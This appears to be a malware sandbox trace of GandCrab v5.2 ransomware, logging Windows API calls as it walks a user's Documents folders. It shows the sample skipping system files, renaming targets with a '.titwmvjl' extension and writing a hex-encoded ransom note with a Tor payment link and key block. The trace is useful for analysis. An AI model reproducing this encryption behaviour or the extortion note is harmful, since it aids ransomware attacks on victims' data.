lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt") returned 82 [0091.364] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.364] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0091.364] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt") returned 82 [0091.364] lstrlenW (lpString=".txt") returned 4 [0091.364] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.364] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.364] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.364] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.364] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt") returned 82 [0091.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt") returned 82 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.365] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.365] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.365] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0091.365] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0091.365] CloseHandle (hObject=0x2b4) returned 1 [0091.366] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.366] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.366] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt" [0091.366] lstrlenW (lpString=".titwmvjl") returned 9 [0091.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt") returned 70 [0091.366] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.366] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 79 [0091.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt") returned 70 [0091.366] lstrlenW (lpString=".txt") returned 4 [0091.366] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.366] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.366] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.366] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt") returned 70 [0091.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\TITWMVJL-DECRYPT.txt") returned 70 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.366] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.367] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.367] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0091.367] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0091.368] CloseHandle (hObject=0x2ac) returned 1 [0091.368] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.368] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0091.368] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0091.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files" [0091.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\" [0091.368] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.369] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.370] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.370] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\\\TITWMVJL-DECRYPT.txt") returned 67 [0091.370] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.371] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x